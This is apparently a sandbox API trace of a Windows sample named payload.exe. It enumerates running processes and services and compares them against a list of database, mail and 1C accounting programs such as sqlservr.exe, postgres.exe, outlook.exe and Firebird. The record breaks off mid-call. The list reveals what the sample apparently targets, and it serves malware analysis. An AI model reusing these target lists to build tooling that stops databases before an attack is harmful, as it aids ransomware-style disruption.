[0268.670] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0268.670] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0268.670] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0268.670] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0268.670] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0268.670] lstrlenW (lpString="lsm.exe") returned 7 [0268.670] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0268.670] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0268.670] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0268.670] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0268.670] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0268.670] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0268.670] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0268.670] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.670] lstrlenW (lpString="svchost.exe") returned 11 [0268.670] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.670] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.670] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.670] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.670] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.671] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.671] lstrlenW (lpString="svchost.exe") returned 11 [0268.671] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.671] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.671] lstrlenW (lpString="svchost.exe") returned 11 [0268.671] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.671] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.672] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.672] lstrlenW (lpString="svchost.exe") returned 11 [0268.672] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.672] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.672] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.673] lstrlenW (lpString="svchost.exe") returned 11 [0268.673] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.673] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.673] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.673] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.673] lstrlenW (lpString="audiodg.exe") returned 11 [0268.673] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.673] lstrlenW (lpString="svchost.exe") returned 11 [0268.673] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.674] lstrlenW (lpString="svchost.exe") returned 11 [0268.674] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0268.674] lstrlenW (lpString="userinit.exe") returned 12 [0268.674] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.674] lstrlenW (lpString="dwm.exe") returned 7 [0268.674] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.674] lstrlenW (lpString="explorer.exe") returned 12 [0268.675] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.675] lstrlenW (lpString="spoolsv.exe") returned 11 [0268.675] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0268.675] lstrlenW (lpString="taskhost.exe") returned 12 [0268.675] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.675] lstrlenW (lpString="svchost.exe") returned 11 [0268.675] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0268.675] lstrlenW (lpString="payload.exe") returned 11 [0268.676] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0268.676] lstrlenW (lpString="dllhost.exe") returned 11 [0268.676] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0268.676] lstrlenW (lpString="reader_sl.exe") returned 13 [0268.676] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0268.676] CloseHandle (hObject=0x390) returned 1 [0268.676] Sleep (dwMilliseconds=0x1f4) [0269.362] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c0b60 [0269.546] EnumServicesStatusExW (in: hSCManager=0x43c0b60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0269.547] GetLastError () returned 0xea [0269.547] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0269.547] EnumServicesStatusExW (in: hSCManager=0x43c0b60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0269.547] CloseServiceHandle (hSCObject=0x43c0b60) returned 1 [0269.547] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0269.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.547] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0269.547] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0269.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0269.547] lstrlenW (lpString="AudioSrv") returned 8 [0269.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0269.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0269.547] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0269.547] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0269.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0269.547] lstrlenW (lpString="BFE") returned 3 [0269.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0269.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0269.548] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0269.548] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0269.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0269.548] lstrlenW (lpString="CryptSvc") returned 8 [0269.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0269.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0269.548] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0269.548] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0269.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0269.548] lstrlenW (lpString="CscService") returned 10 [0269.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0269.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0269.548] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0269.548] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0269.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0269.548] lstrlenW (lpString="DcomLaunch") returned 10 [0269.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.548] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0269.548] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0269.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0269.548] lstrlenW (lpString="Dhcp") returned 4 [0269.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0269.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0269.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0269.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0269.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0269.549] lstrlenW (lpString="Dnscache") returned 8 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0269.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0269.549] lstrlenW (lpString="DPS") returned 3 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0269.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0269.549] lstrlenW (lpString="eventlog") returned 8 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0269.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0269.549] lstrlenW (lpString="EventSystem") returned 11 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0269.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0269.549] lstrlenW (lpString="gpsvc") returned 5 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0269.550] lstrlenW (lpString="LanmanWorkstation") returned 17 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0269.550] lstrlenW (lpString="lmhosts") returned 7 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0269.550] lstrlenW (lpString="MMCSS") returned 5 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0269.550] lstrlenW (lpString="MpsSvc") returned 6 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0269.550] lstrlenW (lpString="NlaSvc") returned 6 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0269.551] lstrlenW (lpString="nsi") returned 3 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0269.551] lstrlenW (lpString="PcaSvc") returned 6 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0269.551] lstrlenW (lpString="PlugPlay") returned 8 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0269.551] lstrlenW (lpString="Power") returned 5 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0269.552] lstrlenW (lpString="ProfSvc") returned 7 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0269.552] lstrlenW (lpString="RpcEptMapper") returned 12 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0269.552] lstrlenW (lpString="RpcSs") returned 5 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0269.552] lstrlenW (lpString="SamSs") returned 5 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0269.552] lstrlenW (lpString="Schedule") returned 8 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0269.553] lstrlenW (lpString="SENS") returned 4 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0269.553] lstrlenW (lpString="ShellHWDetection") returned 16 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0269.553] lstrlenW (lpString="Spooler") returned 7 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0269.553] lstrlenW (lpString="Themes") returned 6 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0269.554] lstrlenW (lpString="UxSms") returned 5 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0269.554] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0269.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0269.555] Process32FirstW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.555] Process32NextW (in: 